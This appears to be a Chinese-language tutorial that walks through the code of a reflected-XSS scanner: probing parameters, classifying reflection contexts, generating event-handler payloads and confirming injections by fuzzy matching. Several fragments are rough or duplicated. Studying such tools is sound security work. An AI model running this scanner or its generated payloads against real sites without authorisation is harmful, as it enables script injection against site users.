扫描器工作流程图
具体流程代码
主扫描文件为scan.py
def scan(target, paramData, encoding, headers, delay, timeout, skipDOM, find, skip):
GET, POST = (False, True) if paramData else (True, False)
# If the user hasn't supplied the root url with http(s), we will handle it
if not target.startswith('http'):
try:
response = requester('https://' + target, {},
headers, GET, delay, timeout)
target = 'https://' + target
except:
target = 'http://' + target
logger.debug('Scan target: {}'.format(target))
response = requester(target, {}, headers, GET, delay, timeout).text
#去掉dom和waf的代码
for paramName in params.keys():
paramsCopy = copy.deepcopy(params)
logger.info('Testing parameter: %s' % paramName)
if encoding:
paramsCopy[paramName] = encoding(xsschecker)
else:
paramsCopy[paramName] = xsschecker #换成了v3dm0s
response = requester(url, paramsCopy, headers, GET, delay, timeout) #封装之后 指示处理了请求头
occurences = htmlParser(response, encoding)
positions = occurences.keys() #提取敏感字符出现在源码的位置
logger.debug('Scan occurences: {}'.format(occurences))
if not occurences:
logger.error('No reflection found')
continue
else:
logger.info('Reflections found: %i' % len(occurences))#发现几个位置
logger.run('Analysing reflections')
efficiencies = filterChecker(
url, paramsCopy, headers, GET, delay, occurences, timeout, encoding)
logger.debug('Scan efficiencies: {}'.format(efficiencies))
logger.run('Generating payloads')
total=0
for v in vectors.values():
total += len(v)
if total == 0:
logger.error('No vectors were crafted.')
continue
logger.info('Payloads generated: %i' % total)
progress = 0
print('vectors',vectors)
for confidence, vects in vectors.items():
for vect in vects:
if core.config.globalVariables['path']:
vect = vect.replace('/', '%2F')
loggerVector = vect
progress += 1
logger.run('Progress: %i/%i\r' % (progress, total))
if not GET:
vect = unquote(vect)
efficiencies = checker(
url, paramsCopy, headers, GET, delay, vect, positions, timeout, encoding) #利用如果我们的payload原模原样的出现在了响应中,那么基本可以确定漏洞确实存在了,就可以报告出来了
if not efficiencies:
for i in range(len(occurences)):
efficiencies.append(0)
bestEfficiency = max(efficiencies)
if bestEfficiency == 100 or (vect[0] == '\\' and bestEfficiency >= 95):
logger.red_line()
logger.good('Payload: %s' % loggerVector)
logger.info('Efficiency: %i' % bestEfficiency)
logger.info('Confidence: %i' % confidence)
if not skip:
choice = input(
'%s Would you like to continue scanning? [y/N] ' % que).lower()
if choice != 'y':
quit()
elif bestEfficiency > minEfficiency:
logger.red_line()
logger.good('Payload: %s' % loggerVector)
logger.info('Efficiency: %i' % bestEfficiency)
logger.info('Confidence: %i' % confidence)
logger.no_format('')
htmlParser.py 文件(省略requester.py文件,此文件为对request的封装)
import re
import sys
sys.path.append("..")
from config import badTags, xsschecker
from utils.utils import isBadContext, equalize, escaped, extractScripts
from utils.log import log #打印日志
#通过解析html,找出我们的输入输出在了哪种环境下
def htmlParser(response, encoding):
print('进入htmlParser')
rawResponse = response # raw response returned by requests
response = response.text # response content
if encoding: # if the user has specified an encoding, encode the probe in that
response = response.replace(encoding(xsschecker), xsschecker)
reflections = response.count(xsschecker)
print("有回显且回显位置有{}".format(reflections))
position_and_context = {}
environment_details = {}
clean_response = re.sub(r'<!--[.\s\S]*?-->', '', response) #删除html注释
script_checkable = clean_response
for script in extractScripts(script_checkable): #如果回显位在<script>标签里
occurences = re.finditer(r'(%s.*?)$' % xsschecker, script)
if occurences:
for occurence in occurences:
log.debug('occurences%s'%occurence)
thisPosition = occurence.start(1)
position_and_context[thisPosition] = 'script'
environment_details[thisPosition] = {}
environment_details[thisPosition]['details'] = {'quote' : ''}
for i in range(len(occurence.group())):
currentChar = occurence.group()[i]
if currentChar in ('/', '\'', '`', '"') and not escaped(i, occurence.group()):
environment_details[thisPosition]['details']['quote'] = currentChar
elif currentChar in (')', ']', '}', '}') and not escaped(i, occurence.group()):
break
script_checkable = script_checkable.replace(xsschecker, '', 1)
if len(position_and_context) < reflections: #如果标签里的数量,小于回显位的数量,则证明回显位在标签外面也有
attribute_context = re.finditer(r'<[^>]*?(%s)[^>]*?>' % xsschecker, clean_response) #在<> 标签里 有敏感字符
# print(attribute_context,55555555555)
# log.debug('occurences%s'%occurence)
for occurence in attribute_context:
match = occurence.group(0) #匹配的整个 字符串
thisPosition = occurence.start(1)
parts = re.split(r'\s', match)
tag = parts[0][1:] #提取出标签 如 input
for part in parts:
if xsschecker in part:
Type, quote, name, value = '', '', '', ''
if '=' in part:
quote = re.search(r'=([\'`"])?', part).group(1) #找到 value="v3dm0s" 后面是单引号还是双引号
name_and_value = part.split('=')[0], '='.join(part.split('=')[1:])#分开 value="v3dm0s" 的name 和value
if xsschecker == name_and_value[0]:
Type = 'name'
else:
Type = 'value'
name = name_and_value[0]
value = name_and_value[1].rstrip('>').rstrip(quote).lstrip(quote)
else:
Type = 'flag'
position_and_context[thisPosition] = 'attribute'
environment_details[thisPosition] = {}
environment_details[thisPosition]['details'] = {'tag' : tag, 'type' : Type, 'quote' : quote, 'value' : value, 'name' : name} #'position': 455, 'context': 'attribute', 'details': {'tag': 'input', 'type': 'value', 'quote': '"', 'value': 'v3dm0s', 'name': 'value'}}}
if len(position_and_context) < reflections:
html_context = re.finditer(xsschecker, clean_response) #寻找敏感字符
for occurence in html_context:
print(occurence,'occurenceoccurence')
thisPosition = occurence.start()
if thisPosition not in position_and_context:
position_and_context[occurence.start()] = 'html' #{'position': 355, 'context': 'html', 'details': {}
environment_details[thisPosition] = {}
environment_details[thisPosition]['details'] = {}
if len(position_and_context) < reflections:
comment_context = re.finditer(r'<!--[\s\S]*?(%s)[\s\S]*?-->' % xsschecker, response) #在注释里寻找敏感字符
for occurence in comment_context:
thisPosition = occurence.start(1)
position_and_context[thisPosition] = 'comment'
environment_details[thisPosition] = {}
environment_details[thisPosition]['details'] = {}
database = {}
for i in sorted(position_and_context):
database[i] = {}
database[i]['position'] = i
database[i]['context'] = position_and_context[i]
database[i]['details'] = environment_details[i]['details']
print(database,666666666666666)
Z#除去没用的tag
bad_contexts = re.finditer(r'(?s)(?i)<(style|template|textarea|title|noembed|noscript)>[.\s\S]*(%s)[.\s\S]*</\1>' % xsschecker, response)
non_executable_contexts = []
for each in bad_contexts:
non_executable_contexts.append([each.start(), each.end(), each.group(1)])
if non_executable_contexts:
for key in database.keys():
position = database[key]['position']
badTag = isBadContext(position, non_executable_contexts)
if badTag:
database[key]['details']['badTag'] = badTag
else:
database[key]['details']['badTag'] = ''
return database
产生密码 vectors = generator(occurences, response.text) generator.py
def generator(occurences, response):
scripts = extractScripts(response)
index = 0
vectors = {11: set(), 10: set(), 9: set(), 8: set(), 7: set(),
6: set(), 5: set(), 4: set(), 3: set(), 2: set(), 1: set()}
print(occurences,'occurencesoccurences')
for i in occurences:
context = occurences[i]['context']
if context == 'html':
lessBracketEfficiency = occurences[i]['score']['<']
greatBracketEfficiency = occurences[i]['score']['>']
ends = ['//']
badTag = occurences[i]['details']['badTag'] if 'badTag' in occurences[i]['details'] else ''
if greatBracketEfficiency == 100:
ends.append('>')
if lessBracketEfficiency:
print(ends,'endsendsendsendsends')
payloads = genGen(fillings, eFillings, lFillings,
eventHandlers, tags, functions, ends, badTag) #ends= ['//', '>']
print(len(payloads),888888888)
for payload in payloads:
vectors[10].add(payload)
def genGen(fillings, eFillings, lFillings, eventHandlers, tags, functions, ends, badTag=None):
vectors = []
r = randomUpper # randomUpper randomly converts chars of a string to uppercase
for tag in tags:
if tag == 'd3v' or tag == 'a':
bait = xsschecker
else:
bait = ''
for eventHandler in eventHandlers:
# print(11111111,eventHandler)
# if the tag is compatible with the event handler
if tag in eventHandlers[eventHandler]:
count=0
for function in functions:
# print(2222222222222,function)
for filling in fillings:
# print(333333333,filling)
for eFilling in eFillings:
# print(44444444444,eFilling)
for lFilling in lFillings:
# print(5555555555,lFilling)
for end in ends:
if tag == 'd3v' or tag == 'a':
if '>' in ends:
end = '>' # we can't use // as > with "a" or "d3v" tag
breaker = ''
if badTag:
breaker = '</' + r(badTag) + '>'
# print(breaker,tag,filling,eventHandler,eFilling,function,lFilling,end,bait)
vector = breaker + '<' + r(tag) + filling + r(
eventHandler) + eFilling + '=' + eFilling + function + lFilling + end + bait
vectors.append(vector)
return vectors
再次利用产生的payload 验证是否存在xss
for confidence, vects in vectors.items():
for vect in vects:
if core.config.globalVariables['path']:
vect = vect.replace('/', '%2F')
loggerVector = vect
progress += 1
logger.run('Progress: %i/%i\r' % (progress, total))
if not GET:
vect = unquote(vect)
efficiencies = checker(
url, paramsCopy, headers, GET, delay, vect, positions, timeout, encoding) #利用如果我们的payload原模原样的出现在了响应中,那么基本可以确定漏洞确实存在了,就可以报告出来了
if not efficiencies:
for i in range(len(occurences)):
efficiencies.append(0)
bestEfficiency = max(efficiencies)
if bestEfficiency == 100 or (vect[0] == '\\' and bestEfficiency >= 95):
logger.red_line()
logger.good('Payload: %s' % loggerVector)
logger.info('Efficiency: %i' % bestEfficiency)
logger.info('Confidence: %i' % confidence)
if not skip:
choice = input(
'%s Would you like to continue scanning? [y/N] ' % que).lower()
if choice != 'y':
quit()
elif bestEfficiency > minEfficiency:
logger.red_line()
logger.good('Payload: %s' % loggerVector)
logger.info('Efficiency: %i' % bestEfficiency)
logger.info('Confidence: %i' % confidence)
logger.no_format('')
关键对比函数 checker
#payload 为前文生成的environment {'"', '>', '<'}
def checker(url, params, headers, GET, delay, payload, positions, timeout, encoding):
checkString = 'st4r7s' + payload + '3nd'
if encoding:
checkString = encoding(unquote(checkString))
response = requester(url, replaceValue(
params, xsschecker, checkString, copy.deepcopy), headers, GET, delay, timeout).text.lower()
reflectedPositions = []
for match in re.finditer('st4r7s', response):
reflectedPositions.append(match.start())
filledPositions = fillHoles(positions, reflectedPositions)
# Itretating over the reflections
num = 0
efficiencies = []
for position in filledPositions:
allEfficiencies = []
try:
reflected = response[reflectedPositions[num]
:reflectedPositions[num]+len(checkString)] #取出敏感字符 在返回包内的 字符是什么 如敏感字符为'st4r7s' + payload + '3nd' 返回为st4r7s>
efficiency = fuzz.partial_ratio(reflected, checkString.lower())#部分匹配,如果S1是S2的子串依然返回100;
allEfficiencies.append(efficiency)
except IndexError:
pass
if position:
reflected = response[position:position+len(checkString)]
if encoding:
checkString = encoding(checkString.lower())
efficiency = fuzz.partial_ratio(reflected, checkString)
if reflected[:-2] == ('\\%s' % checkString.replace('st4r7s', '').replace('3nd', '')):
efficiency = 90
allEfficiencies.append(efficiency)
efficiencies.append(max(allEfficiencies))
else:
efficiencies.append(0)
num += 1
return list(filter(None, efficiencies))
def filterChecker(url, params, headers, GET, delay, occurences, timeout, encoding):
positions = occurences.keys()
sortedEfficiencies = {}
# adding < > to environments anyway because they can be used in all contexts
environments = set(['<', '>'])
for i in range(len(positions)):
sortedEfficiencies[i] = {}
for i in occurences:
occurences[i]['score'] = {}
context = occurences[i]['context']
if context == 'comment':
environments.add('-->')
elif context == 'script':
environments.add(occurences[i]['details']['quote'])
environments.add('</scRipT/>')
elif context == 'attribute':
if occurences[i]['details']['type'] == 'value':
if occurences[i]['details']['name'] == 'srcdoc': # srcdoc attribute accepts html data with html entity encoding
environments.add('<') # so let's add the html entity
environments.add('>') # encoded versions of < and >
if occurences[i]['details']['quote']:
environments.add(occurences[i]['details']['quote'])
print(environments,'environmentsenvironmentsenvironments')
for environment in environments:
if environment:
efficiencies = checker(
url, params, headers, GET, delay, environment, positions, timeout, encoding)
efficiencies.extend([0] * (len(occurences) - len(efficiencies)))
for occurence, efficiency in zip(occurences, efficiencies):
occurences[occurence]['score'][environment] = efficiency
print(occurences,'occurencesoccurences')
return occurences